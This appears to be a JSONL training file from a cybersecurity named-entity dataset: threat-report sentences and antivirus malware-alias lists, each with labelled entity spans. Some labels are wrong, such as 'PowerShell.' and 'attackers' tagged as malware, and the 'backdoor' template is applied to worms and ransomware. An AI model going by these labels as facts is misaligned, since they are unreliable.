{"text": "A backdoor also known as: W32.HfsOval.152A Backdoor.Win32.VB!O Backdoor.VB.MV3 Trojan.Llac.Win32.24709 Trojan/Injector.eih BKDR_RSHOT.SMA Win32.Backdoor.VB.y BKDR_RSHOT.SMA Win.Trojan.6387874-3 Trojan.Win32.Temr.ssc Trojan.Win32.Temr.ejiehl Backdoor.W32.Ciadoor.lo5L TrojWare.Win32.Qhost.nls Trojan.DownLoader16.56820 Backdoor.Win32.VB BehavesLike.Win32.Trojan.tc Trojan.Temr.ak Backdoor:Win32/Lybsus.A Trojan.Graftor.D4305 Backdoor.Win32.A.VB.168034 Trojan.Win32.Temr.ssc Backdoor.Win32.VB Backdoor.VB Trojan.Injector!pDYfo+3Pf04 Trojan-Spy.Win32.KeyLogger W32/DarkKomet.GUKH!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006234", "source": "cyner2_train"}}
{"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 – 18abe28730c53de6d9e4786c7765c3d8 2 2.0 Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It ’ s interesting that the issuer “ Sun ” matches the “ Sun1 ” and “ Sun2 ” identifiers of infected devices from the FTP server , suggesting they may be test devices .", "spans": {}, "info": {"id": "cyner2_train_006236", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Masteseq Win32.Trojan.WisdomEyes.16070401.9500.9872 Backdoor.Masteseq Trojan.Win32.Masteseq.evvgyd Backdoor.W32.Masteseq!c BackDoor.Liskey Backdoor.Masteseq.x Backdoor:Win32/Masteseq.AC Trojan/Win32.Masteseq.R12342 Trj/GdSda.A Win32.Backdoor.Masteseq.Lpbn Backdoor.Win32.Masteseq Win32/Trojan.d37", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006238", "source": "cyner2_train"}}
{"text": "Cisco Talos is currently observing a widespread campaign leveraging the Samas/Samsam/MSIL.B/C ransomware variant.", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "THREAT_ACTOR: campaign": [[48, 56]], "MALWARE: ransomware variant.": [[94, 113]]}, "info": {"id": "cyner2_train_006239", "source": "cyner2_train"}}
{"text": "Last March 2016, we noted that PowerWare crypto-ransomware also abused PowerShell.", "spans": {"MALWARE: PowerWare crypto-ransomware": [[31, 58]], "MALWARE: PowerShell.": [[71, 82]]}, "info": {"id": "cyner2_train_006240", "source": "cyner2_train"}}
{"text": "What makes this botnet successful is its highly configurable and modular design that can fit any malicious intent, like distributing Zeus or, more recently, distributing a Lethic bot.", "spans": {"MALWARE: botnet": [[16, 22]], "MALWARE: Zeus": [[133, 137]], "MALWARE: Lethic bot.": [[172, 183]]}, "info": {"id": "cyner2_train_006242", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Exploit.WordPerf.B Trojan/Exploit.WordPerf.b TROJ_WORDPERF.B W32/Risk.DAAG-1937 Win32/Exploit.WordPerf.B TROJ_WORDPERF.B Win.Trojan.Exploit-204 Exploit.Win32.WordPerf.b Trojan.Exploit.WordPerf.B Exploit.Win32.WordPerf.gpac Exploit.W32.WordPerf.b!c Trojan.Exploit.WordPerf.B TrojWare.Win32.Exploit.WordPerf.B Trojan.Exploit.WordPerf.B Exploit.Qaaz Exploit.WordPerf.Win32.2 Exploit.WordPerf.b TR/Expl.WordPerf.B Trojan[Exploit]/Win32.WordPerf Win32.EXPLOIT.WordPerf.b.kcloud Exploit:Win32/WordPerf.B Trojan.Exploit.WordPerf.B Exploit.Win32.WordPerf.b Trojan.Exploit.WordPerf.B Trojan.Exploit.WordPerf.B Win32.Exploit.Wordperf.Wxrv Exploit.WordPerf!zPzGZ0A1+Q4 Trojan.Win32.Exploit W32/WordPerf.B!exploit Win32/Trojan.827", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006243", "source": "cyner2_train"}}
{"text": "Rokku seems to be distributed by a malicious document, which contains a macro that when is executed downloads and runs Rokku.", "spans": {"MALWARE: Rokku": [[0, 5]], "MALWARE: macro": [[72, 77]], "MALWARE: Rokku.": [[119, 125]]}, "info": {"id": "cyner2_train_006246", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.O W32.Virut.CF Win32/Virut.17408 PE_VIRUX.O Win32.Virus.Virut.Q Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.mzNk Win32.Virut.56 Virus.Virut.Win32.1938 Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.cr.61440 TrojanDownloader:MSIL/Tackerkin.A Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Trojan-Downloader.MSIL W32/Virut.CE Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006248", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Ryzerlo.A3 Trojan.Ransom.HiddenTears.1 Ransom_BLOCCATO.SM Ransom.HiddenTear Ransom_BLOCCATO.SM MSIL.Trojan-Ransom.Cryptear.B Trojan.Win32.Filecoder.ethwkz Trojan.Win32.Z.Ransom.211968.EF TrojWare.MSIL.Ransom.Ryzerlo.A Trojan.Encoder.10598 Trojan-Ransom.HiddenTear TR/ATRAPS.jnrzk Ransom.HiddenTear/Variant Trojan.Ransom.HiddenTear Trj/GdSda.A MSIL/Filecoder.Y!tr Win32/Trojan.61e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006252", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod232.Trojan.380a Heur.Win32.Veebee.1!O TrojanSpy.VB!WEMPyAgOnlg W32/MalwareF.ZFHU Trojan-Spy.Win32.VB.dwb Trojan.Win32.VB.cpxay Trojan.Win32.A.VB.77932 TrojWare.Win32.TrojanSpy.VB.NNW Trojan.DownLoader1.62643 Trojan[Spy]/Win32.VB PWS:Win32/Gypthoy.A W32/Risk.FBWB-6710 Trojan.VBRA.02824 Trojan-Spy.Win32.VB W32/VB.DWB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006254", "source": "cyner2_train"}}
{"text": "The attack was found to heavily rely on RTF exploits and at the time, thought to make use of the PlugX malware family.", "spans": {"VULNERABILITY: RTF exploits": [[40, 52]], "MALWARE: PlugX malware family.": [[97, 118]]}, "info": {"id": "cyner2_train_006255", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Backdoor.Bot.97496 W32.Virut.D Backdoor.Bot.97496 Virus.LdPinch.Win32.1 W32/Virut.F Backdoor.Bot.D17CD8 Win32.Virus.Virut.i W32/Sdbot.ACIH W32.IRCBot PE_VIRUT.D-1 Win.Trojan.Virut-16 Backdoor.Bot.97496 Virus.Win32.Virut.n Backdoor.Bot.97496 Virus.Win32.Virut.jxol Backdoor.Win32.A.IRCBot.97792 Virus.W32.Virut!c Backdoor.Bot.97496 PE_VIRUT.D-1 BehavesLike.Win32.Virut.pc Worm.Win32.Kulsibot W32/Sdbot.OGIG-1311 Win32/Virut.e Virus/Win32.Virut.n Win32.Virut.n.2600 Worm:Win32/Kulsibot.A Virus.Win32.Virut.n Win32/Virut.D Win32/Virut.E Virus.Win32.HanKu.e Virus.Win32.Virut.AT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006257", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.BypauTH.Trojan Application.Hacktool.Vncpass.A Trojan-Spy/W32.Vnc.32768 NetTool.Win32.VNC!O Tool.VNC.Win32.1 Win32.Trojan.WisdomEyes.16070401.9500.9990 W32/Tool.PPKE-1202 Backdoor.Prorat Application.Hacktool.Vncpass.A not-a-virus:NetTool.Win32.VNC.a Application.Hacktool.Vncpass.A Riskware.Win32.VNC.hsfc Application.Hacktool.Vncpass.A ApplicUnsaf.Win32.NetTool.VNC.A Application.Hacktool.Vncpass Tool.VncBypauth not-a-virus:NetTool.Win32.VNC W32/HackTool.CDN NetTool.VNC.b HackTool[NetTool]/Win32.VNC Application.Hacktool.Vncpass.A not-a-virus:NetTool.Win32.VNC.a Win-AppCare/Vnc.32768 HackTool.VNC!Pb5Dm1ZMh30 Win32/Virus.NetTool.8e7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006259", "source": "cyner2_train"}}
{"text": "US defense contractors were only fairly recent targets based on the operation's history, which we traced to spear-phishing in 2010.", "spans": {"ORGANIZATION: US defense contractors": [[0, 22]], "THREAT_ACTOR: operation's": [[68, 79]]}, "info": {"id": "cyner2_train_006260", "source": "cyner2_train"}}
{"text": "By now, most of the malware researchers are used to seeing drive-by infections that serve up a handful of malware, from droppers to payloads.", "spans": {"ORGANIZATION: malware researchers": [[20, 39]], "MALWARE: droppers": [[120, 128]], "MALWARE: payloads.": [[132, 141]]}, "info": {"id": "cyner2_train_006263", "source": "cyner2_train"}}
{"text": "However, global security companies are limited in collecting attack information in Korea, and there is also a lack of information about the attacks that Lazarus or Lazarus are suspected of as a small group of threat groups in Korea.", "spans": {"ORGANIZATION: global security companies": [[9, 34]], "THREAT_ACTOR: Lazarus": [[153, 160], [164, 171]], "THREAT_ACTOR: a small group of threat groups": [[192, 222]]}, "info": {"id": "cyner2_train_006266", "source": "cyner2_train"}}
{"text": "But SamSam isn't the only ransomware out there charging eye-watering amounts to decrypt business servers.", "spans": {"MALWARE: SamSam": [[4, 10]], "MALWARE: ransomware": [[26, 36]], "SYSTEM: decrypt business servers.": [[80, 105]]}, "info": {"id": "cyner2_train_006271", "source": "cyner2_train"}}
{"text": "This variant uses a new UAC bypass method that has been used by the Dridex malware since December, 2014.", "spans": {"MALWARE: Dridex malware": [[68, 82]]}, "info": {"id": "cyner2_train_006272", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9882 Backdoor.Teambot Trojan.Win32.Kazy.cxkslh Trojan.PWS.Spy.19585 Trojan.Kazy.D1E900 Backdoor:Win32/Pavica.B!dll Backdoor/Win32.Pavica.R161181", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006273", "source": "cyner2_train"}}
{"text": "It also drops decoy documents in an attempt to camouflage the attack.", "spans": {}, "info": {"id": "cyner2_train_006276", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9821 BehavesLike.Win32.Trojan.tc Trojan/Win32.MSILKrypt.C2372735", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006278", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9890 Backdoor.Win32.Ruledor.c BackDoor.Ruller Downloader.Adload.Win32.15034 BehavesLike.Win32.Sural.tc Trojan[Backdoor]/Win32.Ruledor Backdoor:Win32/Ruledor.B Backdoor.Win32.Ruledor.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006282", "source": "cyner2_train"}}
{"text": "They evade detection by keeping their code simple and flying under the radar.", "spans": {}, "info": {"id": "cyner2_train_006283", "source": "cyner2_train"}}
{"text": "We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents, as well as several of the dynamic DNS domain names used to host C2 servers that contain the words Thai or Thailand", "spans": {"MALWARE: Bookworm": [[43, 51]], "ORGANIZATION: targeting organizations": [[62, 85]]}, "info": {"id": "cyner2_train_006284", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Autoit.ARV Worm.AutoIt.Helompy.A Trojan.Autoit.ARV Worm.AutoRun.Win32.33975 Win32.Trojan.AutoIt.a W32/Trojan2.MFAR W32.SillyDC Win.Trojan.Autoit-1267 Worm.Win32.AutoIt.agm Trojan.Autoit.ARV Trojan.Win32.Napad.ijfyd Worm.Win32.A.IM-Sohanad.278196 Win32.HLLW.Napad BehavesLike.Win32.YahLover.hc W32/Trojan.MASJ-0546 Worm/AutoRun.sfx Worm:Win32/Helompy.A Trojan.Autoit.ARV Worm.Win32.AutoIt.agm HEUR/Fakon.mwf Trojan.Autoit.ARV Trj/CI.A I-Worm.Autoit.GP Worm.Win32.Autorun.aao Win32/Trojan.e4c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006286", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ArchSMS Win32.Trojan.WisdomEyes.16070401.9500.9977 Hoax.Win32.ArchSMS.upa Win32.Trojan-psw.Archsms.Pgnh Trojan.Fraudster.307 Trojan:Win32/MobicArch.A Hoax.Win32.ArchSMS.upa Win32.Trojan.ArchSMS.D Spyware/Win32.ArchSMS.R32549 Hoax.ArchSMS.ge Hoax.Win32.ArchSMS Win32/Trojan.b8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006288", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pokey.A Trojan.Pokey.A Trojan.Pokey.A WORM_PIKACHU.A W32/Trojan.GNFD-9297 W32.Pokey.Worm Win32/Pikachu.32768 WORM_PIKACHU.A Win.Worm.Pikachu-2 Trojan.Pokey.A Email-Worm.Win32.Pikachu Trojan.Pokey.A Trojan.Win32.Pikachu.enlz I-Worm.Win32.Pikachu Trojan.Pokey.A Worm.Win32.Pikachu.A Trojan.Pokey.A Worm.Pikachu.Win32.2 Pokey.a Email-Worm.Win32.Pikachu W32/Trojan2.CSH Worm:Win32/Pokey.A@mm WORM/Pikachu.AuExec Worm[Email]/Win32.Pikachu Worm:Win32/Pokey.A@mm Worm.Pokey Email-Worm.Win32.Pikachu Pokey.a Email-Worm.Pikachu Win32/Pikachu.A I-Worm.Pikachu W32/Pikachu.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006289", "source": "cyner2_train"}}
{"text": "Derusbi has been widely covered and associated with Chinese threat actors.", "spans": {"MALWARE: Derusbi": [[0, 7]], "THREAT_ACTOR: Chinese threat actors.": [[52, 74]]}, "info": {"id": "cyner2_train_006290", "source": "cyner2_train"}}
{"text": "The macro will download ransomware or banking malware after execution. JavaScript files, executed by Wscript in Windows, dropping, for example, Locky ransomware.", "spans": {"MALWARE: macro": [[4, 9]], "MALWARE: ransomware": [[24, 34]], "MALWARE: banking malware": [[38, 53]], "SYSTEM: Windows,": [[112, 120]], "MALWARE: Locky ransomware.": [[144, 161]]}, "info": {"id": "cyner2_train_006292", "source": "cyner2_train"}}
{"text": "OceanLotus, also known as APT32, is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics, techniques, and procedures TTPs.", "spans": {"THREAT_ACTOR: OceanLotus,": [[0, 11]], "THREAT_ACTOR: APT32,": [[26, 32]], "THREAT_ACTOR: a Vietnam-based APT group": [[51, 76]]}, "info": {"id": "cyner2_train_006295", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.SoulClose.E Worm.Win32.VB!O W32.Vb.RC Win32.Worm.SoulClose.E W32/VB.rc Win32.Worm.SoulClose.E PE_SOULOPEN.A Win32.Worm.VB.bc W32/Worm.EGII-1744 W32.Fujacks.C Win32/NoelOpus.B PE_SOULOPEN.A Win.Worm.VB-5176 Win32.Worm.SoulClose.E Worm.Win32.VB.rc Win32.Worm.SoulClose.E Trojan.Win32.VB.ooto Worm.Win32.A.VB.66048.A[UPX] Worm.W32.Vb!c Win32.Worm.SoulClose.E Virus.Win32.VB.~A Win32.Worm.SoulClose.E Win32.HLLW.Autoruner.2173 BehavesLike.Win32.Dropper.tm W32/Worm.VIF Worm/VB.pcu TR/VB.dek.1 Worm/Win32.VB Worm.VB.rc.kcloud Worm:Win32/Soulclose.A Worm.Win32.VB.rc Trojan/Win32.HDC.C146348 W32/HLLP.Soul.a Worm.VB Win32/AutoRun.VB.HG Win32.Worm.Vb.Eex Worm.Soulclose!T6Z53ODblJg Virus.Worm.Win32.VB W32/VB.MJU!tr Virus.Win32.VBViking.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006296", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Way Backdoor.Way.Win32.124 W32/Backdoor.HAT Backdoor.Trojan Win32/FakeMS.WOCR Win.Trojan.Dealply-6391261-0 Backdoor.Win32.Way.10 Trojan.Win32.Way.wibi Trojan.Win32.Z.Way.314010 Backdoor.W32.Way!c BackDoor.Way.10 Backdoor.Win32.Way W32/Backdoor.EORF-5693 Backdoor/NetStar.10 Trojan[Backdoor]/Win32.Way Backdoor.Win32.Way.10 Win32.Backdoor.Way.Dztb Backdoor.Way!jjTH+E6uXaw W32/Way.A!tr Win32/Backdoor.008", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006298", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sirefef.A Backdoor/ZAccess.trq Win32.Trojan.WisdomEyes.16070401.9500.9982 TROJ_SIREFEF.SM Trojan.Win32.ZAccess.tiikz Backdoor.Win32.A.ZAccess.190464.AD Backdoor.Win32.ZAccess.TZS BackDoor.Maxplus.5433 Trojan.FakeAV.Win32.243037 TROJ_SIREFEF.SM BehavesLike.Win32.ZeroAccess.cc Trojan.Win32.Sirefef Backdoor/ZAccess.dbk Trojan[Backdoor]/Win32.ZAccess Trojan:Win32/Sirefef.P Trojan.Kazy.D1335F Backdoor/Win32.ZAccess.R28242 ZeroAccess.ex BScope.Backdoor.Maxplus.2613 Rootkit.0Access", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006299", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Leech.I HEUR:Trojan-Dropper.AndroidOS.Leech.c Android.Packed.5 ZIP/Trojan.PXTI-7 SPR/ANDR.Jiagu.zhye Troj.Dropper.Androidos!c HEUR:Trojan-Dropper.AndroidOS.Leech.c PUA.AndroidOS.MoneyReward", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006300", "source": "cyner2_train"}}
{"text": "When reversing malware samples, one of the things that we as analysts look for are places where the attackers slip up.", "spans": {"MALWARE: malware": [[15, 22]], "MALWARE: attackers": [[100, 109]]}, "info": {"id": "cyner2_train_006301", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Packed.EZip.a Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_BIFROS.SMI Win.Trojan.Mybot-4352 Trojan.Win32.139069.ebchy Backdoor.Win32.Rbot.~d5 TROJ_BIFROS.SMI Trojan/Win32.Unknown Trojan.ManBat.1 Troj.W32.Refroso.lnM8 TrojanDropper:Win32/Bifrose.F Trojan.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006302", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Qhosts Virus.W32.Specx.B!c Heur.Corrupt.PE Trojan[Backdoor]/Win32.IRCBot Worm:Win32/Specx.C.dam#2 Trj/CI.A Worm.Win32.Specx Win32/Trojan.bba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006303", "source": "cyner2_train"}}
{"text": "After analysis, it was confirmed that the sample belonged to the discovered botnet family Kaiji.", "spans": {"MALWARE: botnet family Kaiji.": [[76, 96]]}, "info": {"id": "cyner2_train_006304", "source": "cyner2_train"}}
{"text": "The spam e-mails are enticing users by impersonating well known companies, using their logos and known subject lines to further sell the deception.", "spans": {}, "info": {"id": "cyner2_train_006309", "source": "cyner2_train"}}
{"text": "The Blogspot page contained a javascript window location that redirected the visitor to a second URL hosted on a dedicated server.", "spans": {"ORGANIZATION: visitor": [[77, 84]], "SYSTEM: a dedicated server.": [[111, 130]]}, "info": {"id": "cyner2_train_006311", "source": "cyner2_train"}}
{"text": "In this campaign, it mainly tries to steal Firefox and other credentials.", "spans": {"THREAT_ACTOR: campaign,": [[8, 17]], "SYSTEM: Firefox": [[43, 50]]}, "info": {"id": "cyner2_train_006312", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9900 Win.Spyware.Banker-4198 not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan.Winlock.5377 BehavesLike.Win32.Kespo.cc Troj.W32.Delf.l4mb not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan:Win32/Comine.A Trojan-Downloader.Win32.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006313", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kryptik.Win32.1331272 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Kryptik.ewfvwr Trojan.DownLoader24.52368 BehavesLike.Win32.Trojan.jz Trj/GdSda.A Trojan.MSIL.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.DAD41 Win32.Trojan.WisdomEyes.16070401.9500.9993 PUA.Downloader Trojan.Win32.AVKill.dciepf Trojan.AVKill.30546 TR/Kryptik.clfug Trojan:MSIL/Krolol.A Win32/Trojan.b49", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006315", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Cloda53.Trojan.5b54 W32/Delf.g W32/SillyWorm.CE W32.Miliam@mm Win.Worm.Minima-1 Email-Worm.Win32.Delf.g Trojan.Win32.Delf.gmcr W32.W.Delf.g!c Worm.Win32.Delf.g Worm.Delf.Win32.349 BehavesLike.Win32.Downloader.lc W32/Worm.NVHR-2426 I-Worm/Delf.ls WORM/Atak.L W32/Delf.G@mm Worm[Email]/Win32.Delf Worm/Win32.Xema.N403133190 Worm:Win32/Miliam.A@mm Worm.Delf Win32.Worm-email.Delf.Ebqb Email-Worm.Win32.Delf I-Worm/Delf.X", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006316", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Softwarebundler.Wizrem.FC.2316 Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan.Win32.Z.Revirdit.463872 Backdoor:MSIL/Revirdit.A Trojan.MSILPerseus.D1F0A1 Trj/GdSda.A Win32/Trojan.ed9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006318", "source": "cyner2_train"}}
{"text": "During a recent compromise assessment, Cylance incident responders and threat researchers uncovered a surreptitious and sophisticated remote access trojan RAT that had been planted and operated by the suspected threat actor.", "spans": {"ORGANIZATION: Cylance incident responders": [[39, 66]], "ORGANIZATION: threat researchers": [[71, 89]], "MALWARE: remote access trojan RAT": [[134, 158]], "THREAT_ACTOR: the suspected threat actor.": [[197, 224]]}, "info": {"id": "cyner2_train_006322", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.DPQH-6594 Win32/Tnega.aTYcGTB Trojan.Win32.Small.cjn Troj.W32.Small!c TR/Jord.dvwus Trojan:Win32/Mvpaten.A Trojan.Win32.Small.cjn Win32.Trojan.Small.Llqr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006323", "source": "cyner2_train"}}
{"text": "Targets included a wide array of high-profile entities, including intelligence services, military, utility providers telecommunications and power, embassies, and government institutions.", "spans": {"ORGANIZATION: high-profile entities,": [[33, 55]], "ORGANIZATION: intelligence services, military, utility providers telecommunications and power, embassies,": [[66, 157]], "ORGANIZATION: government institutions.": [[162, 186]]}, "info": {"id": "cyner2_train_006326", "source": "cyner2_train"}}
{"text": "Curiously, the Word document does not contain any macros, or even an exploit.", "spans": {"MALWARE: exploit.": [[69, 77]]}, "info": {"id": "cyner2_train_006330", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Netsky.T@mm.Damaged Damage.Small W32/Netsky.t@MM W32/Netsky.T@MM I-Worm.Netsky.FJ Netsky.T@mm WORM_NSKY.DAM Win32.NetSky.t Email-Worm.Win32.NetSky.t Email-Worm.Win32.NetSky!IK Heur.Corrupt.PE Win32.HLLM.Netsky.18432 Worm/Netsky.#1 WORM_NSKY.DAM W32/Netsky.t@MM I-Worm/NetSky.u Worm:Win32/Netsky.CY@mm.dam#4 Email-Worm.Win32.NetSky.t Worm.Mail.Win32.NetSky.daq Email-Worm.Win32.NetSky W32/Netsky.T@mm W32/Netsky.T.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006333", "source": "cyner2_train"}}
{"text": "And finally it's important to highlight that the RAT itself is not new.", "spans": {}, "info": {"id": "cyner2_train_006334", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Autoit.CoinMiner.AT Trojan/CoinMiner.jr Win32.Trojan.WisdomEyes.16070401.9500.9906 TROJ_GE.DAFBBB38 Win32.Trojan.Coinminer.A Troj.W32.Autoit.lWc9 Application.Win32.CoinMiner.B Tool.BtcMine.195 Trojan.CoinMiner.Win32.1291 TR/Comitsproc.gbs Trojan.Autoit.Wirus Win32/Fynloski.AN Worm.Win32.AutoIt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006335", "source": "cyner2_train"}}
{"text": "At that time of the analysis, it was unclear how victims were exposed to OSX/Keydnap.", "spans": {"MALWARE: OSX/Keydnap.": [[73, 85]]}, "info": {"id": "cyner2_train_006336", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.BSKG.dlyohq Trojan.Packed.29890 Trojan:Win32/Chanitor.A Trojan/Win32.Zbot.C916515 Win32/Injector.BSKG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006337", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Marijku TROJ_DLOAD.XL W32/Downldr2.FJJI Win32/Tnega.AZ TROJ_DLOAD.XL Trojan.Win32.Downloader.208896.AR Trojan.DownLoad3.7906 BehavesLike.Win32.Downloader.dc W32/Downloader.MIEG-4062 Trojan.Heur.D.nm6fbaHVu8n Trojan:Win32/Marijku.A Trojan/Win32.Downloader.R6539 Win32/BHO.NIZ Trojan.Win32.StartPage.BE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006339", "source": "cyner2_train"}}
{"text": "A spear-phishing email targeting a voice actor YouTuber in South Korea was used to distribute Lumma Stealer malware, according to analysis by S2W TALON and the BBC.", "spans": {"ORGANIZATION: a voice actor YouTuber": [[33, 55]], "MALWARE: Lumma Stealer malware,": [[94, 116]], "ORGANIZATION: S2W TALON": [[142, 151]], "ORGANIZATION: the BBC.": [[156, 164]]}, "info": {"id": "cyner2_train_006340", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.Downloader.W32.Zlob.kYLL W32/Trojan.BZWN Trojan.Farfli RTKT_FARFLI.EOJ Win.Downloader.13148-1 TrojWare.Win32.Magania.~E Trojan.DownLoad.47002 Downloader.Win32.55183440 RTKT_FARFLI.EOJ Virus.Win32.Hmir Win32.Troj.RootkitT.r.16800 Backdoor:WinNT/Farfli.B!sys Trojan/Win32.Hmir.C55747 Trojan.Graftor.D5437", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006341", "source": "cyner2_train"}}
{"text": "Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.", "spans": {"ORGANIZATION: governments of members of the Commonwealth of Independent States; Asian, African,": [[37, 118]], "ORGANIZATION: Middle Eastern governments; organizations": [[123, 164]], "ORGANIZATION: Chechen extremism;": [[181, 199]], "ORGANIZATION: Russian speakers": [[204, 220]]}, "info": {"id": "cyner2_train_006343", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9545 Trojan.Win32.Qhost", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006344", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_Anunau.R002C0DK417 Trojan.Win32.RansomHeur.eutbif Ransom_Anunau.R002C0DK417 BehavesLike.Win32.Evasion.dh Trojan.Win32.Injector TR/AD.RansomHeur.ibtfr Ransom:Win32/Anunau.A Trojan/Win32.Inject.R211968 SScope.Trojan.FakeAV.01695 Trj/CI.A Trojan.Symmi.D13583", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006345", "source": "cyner2_train"}}
